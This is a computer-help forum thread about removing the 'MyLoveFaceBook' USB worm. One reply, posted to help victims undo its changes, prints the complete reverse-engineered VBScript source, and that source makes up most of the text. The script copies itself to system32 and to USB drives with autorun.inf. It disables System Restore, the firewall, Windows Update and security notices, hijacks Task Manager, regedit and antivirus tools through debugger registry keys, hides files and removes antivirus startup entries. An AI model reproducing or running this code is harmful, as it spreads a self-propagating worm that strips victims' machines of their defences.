Removing my love facebook.LiuYifei@hotmail.co

November 2, 2010 at 03:32:28
Specs: Windows XP, ram 512 , intel centrino
hi this statement is appear 2 day in my internet explorer address bar
how to remove this virus

See More: Removing my love facebook.LiuYifei@hotmail.co

Report •


#1
November 2, 2010 at 05:03:26
you can start by running a full scan with malwarebytes to see if that cleans it up.

Some HELP in posting on Computing.net plus free progs and instructions Cheers


Report •

#2
January 12, 2011 at 02:53:52
I faced the same problem but I solved it by using two tools
- download mseinstall and Hijack tools
- run mseinstall tool, after you finished; you have to restart your computer
then run Hijack and the mylovefacebook will disapear

Report •

#3
January 20, 2011 at 06:05:40
Use MLFRT (mylovefacebook Removal Tool), it's free too from Sergiwa.com. It removes the virus with only one click in few seconds.
http://www.sergiwa.com/modules/mydo...

Report •

Related Solutions

#4
January 28, 2011 at 04:09:51
Hi, I've manage to reverse engineer the vb script that causes this virus. It's usually disguised as a thumbss.db file on usb pen drives and executed through autorun.inf.

Here is the vb script. I guess you will have to undo / restore all these registry entries which is best done through a freeware registry editor (the virus disables regedit)


'by : MyLoveFaceBook.LiuYiFei@Hotmail.CoM

on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd

'===================================================================================

atr = "[autorun]"&vbcrlf&"shellexecute=Wscript.exe /e:vbs Thumbss.db"

'===================================================================================

set fs = createobject("Scripting.FileSystemObject")

set mf = fs.getfile(Wscript.ScriptFullname)

set reg=createobject("WScript.Shell")

dim text,size

size = mf.size

check = mf.drive.drivetype

set text=mf.openastextstream(1,-2)

do while not text.atendofstream

mysource=mysource&text.readline

mysource=mysource & vbcrlf

loop

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath&"\system32\baseWINDOWS.db") : tf.attributes=32

'==================================================

'this code for server

'DefaultIcon========================================

resultat = reg.regread ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\dbfile\DefaultIcon\")

reg.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\",resultat

reg.regwrite "HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName", "Fichier de la base de données", "REG_SZ"

'Disable&open with majdi

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR",1,"REG_DWORD"

'Services

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Start",4,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Start",4,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start",4,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\usnjsvc\Start",2,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\Start",2,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Messenger",2,"REG_DWORD"

'Security Center

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify",1,"REG_DWORD"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride",1,"REG_DWORD"

''

reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo",0,"REG_DWORD"

reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout",0,"REG_DWORD"

reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\DisplayLogo",0,"REG_DWORD"

reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

reg.regwrite "HKEY_CLASSES_ROOT\exefile\shell\Scan with Anti-Trojan\command\",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_CLASSES_ROOT\exefile\shell\Ouvrir avec...\command\",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwtsn32.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwin.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Opera.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Safari.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger","C:\Program Files\Internet Explorer\IEXPLORE.EXE" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trjscan.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rmvtrjan.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mvyA.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutorunRemover.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Avira.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LaunchU3.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Startup CP.exe\Debugger",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

'getfile

Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & "\system32\baseWINDOWS.db")

tf.attributes = 32

set tf=fs.createtextfile(winpath & "\system32\baseWINDOWS.db",2,true)

tf.write mysource

tf.close

set tf = fs.getfile(winpath & "\system32\baseWINDOWS.db")

tf.attributes = 39

'flashdrive

do

for each flashdrive in fs.drives

If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

set tf=fs.getfile(flashdrive.path &"\Thumbss.db")

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &"\Thumbss.db",2,true)

tf.write mysource

tf.close

set tf=fs.getfile(flashdrive.path &"\Thumbss.db")

tf.attributes = 39

set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 32

set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)

tf.write atr

tf.close

set tf =fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 39

end if

'start

next

set rg = createobject("WScript.Shell")

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Adobe Reader 9.0",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\baseWINDOWS",winpath&"\system32\wscript.exe /E:vbs "&winpath&"\system32\baseWINDOWS.db" ,"REG_SZ"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled",1,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"

rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue",0,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," (-[ MyLoveFaceBook.LiuYiFei@Hotmail.CoM ]-) "

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.site-officiel.110mb.com/"

rg.RegDelete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\TypedURLs\"

rg.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\avast!"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\AVG"

rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Avira"

if check <> 1 then

Wscript.sleep 5000

end if

loop while check<>1

set sd = createobject("Wscript.shell")

sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname


Report •

Ask Question